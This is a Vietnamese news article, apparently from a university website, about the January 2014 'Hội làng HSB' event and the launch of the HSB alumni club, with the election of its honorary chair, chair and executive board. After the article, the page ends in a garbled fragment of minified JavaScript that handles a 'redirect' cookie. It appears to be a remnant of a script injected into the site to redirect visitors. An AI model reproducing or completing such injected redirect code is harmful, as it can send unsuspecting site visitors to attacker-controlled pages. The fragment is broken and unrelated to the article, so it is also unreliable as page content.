Hoi Lang HSB Van NgheSáng 24/1/2014, tại Khoa Quản trị Kinh doanh (HSB) thuộc Đại học Quốc gia Hà Nội, gần 100 cựu học viên đại diện cho các khóa và toàn thể cán bộ, giảng viên, nhân viên HSB đã cùng nhau tổ chức lễ hội chào đón năm mới theo truyền thống lâu năm của HSB, đó là Hội làng HSB 2014.

Sáng 24/1/2014 tại Khoa Quản trị Kinh doanh (HSB) thuộc Đại học Quốc gia Hà Nội gần 100 cựu học viên đại diện cho các khóa và toàn thể cán bộ, giảng viên, nhân viên HSB đã cùng nhau tổ chức lễ hội chào đón năm mới theo truyền thống lâu năm của HSB, đó là Hội làng HSB 2014. Trong không khí vui mừng đón chào năm mới, lễ ra mắt Câu lạc bộ Cựu học viên HSB (viết tắt là AC-HSB) đã được diễn ra long trọng tại Giảng đường Chu Văn An. Tham dự buổi lễ có GS.TSKH. Vũ Minh Giang – Chủ tịch Hội đồng KH&ĐT của HSB, PGS.TS. Hoàng Đình Phi – Phó Chủ nhiệm phụ trách HSB, cùng toàn thể cán bộ giảng viên HSB và các cựu học viên.

Ra mat cau lac bo cuc hoc vien HSB
Câu lạc bộ Cựu học viên HSB đã bầu đồng chí Đinh Tiến Dũng, cựu học viên khóa IeMBA2, Bộ trưởng Bộ Tài chính, làm Chủ tịch Danh dự; đồng chí Nguyễn Trần Nam, cựu học viên khóa IeMBA5, Thứ trưởng Bộ Xây dựng, làm Chủ tịch AC-HSB. Ban điều hành AC-HSB gồm 1 chủ tịch, 7 phó chủ tịch và 31 thành viên đại diện cho cựu học viên các khóa.

Phát biểu sau lễ ra mắt Ban Điều hành AC-HSB, anh Nguyễn Trần Nam cảm ơn sự tin tưởng của các anh chị em cựu học viên và hứa sẽ cùng với các phó chủ tịch và thành viên Ban Điều hành đoàn kết và sáng tạo trong các hoạt động hỗ trợ và kết nối cựu học viên với nhau và với HSB, có đóng góp tích cực cho sự nghiệp phát triển bền vững thương hiệu HSB. Anh cũng chia sẻ tình cảm và sự tri ân của anh và các cựu học viên đối với các thầy cô giáo HSB và đánh giá cao phương pháp và chất lượng đào tạo của HSB hơn 18 năm qua, đã giúp cho nhiều thế hệ học viên mở rộng tầm nhìn chiến lược, nâng cao được kỹ năng lãnh đạo và quản trị, thành công trong sự nghiệp, góp phần phát triển nguồn nhân lực quan trọng cho nhiều cơ quan, tổ chức và doanh nghiệp.

Với gần 12.000 cựu học viên thành đạt trên nhiều lĩnh vực, AC-HSB có đủ các nguồn lực để thực hiện tốt các hoạt động kết nối cộng đồng HSB với mục tiêu tăng cường giao lưu, trao đổi kiến thức, kinh nghiệm và hỗ trợ các cựu học viên và học viên HSB phát triển bền vững, góp phần khẳng định uy tín thương hiệu HSB của ĐHQGHN.

{var U=(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’‘)}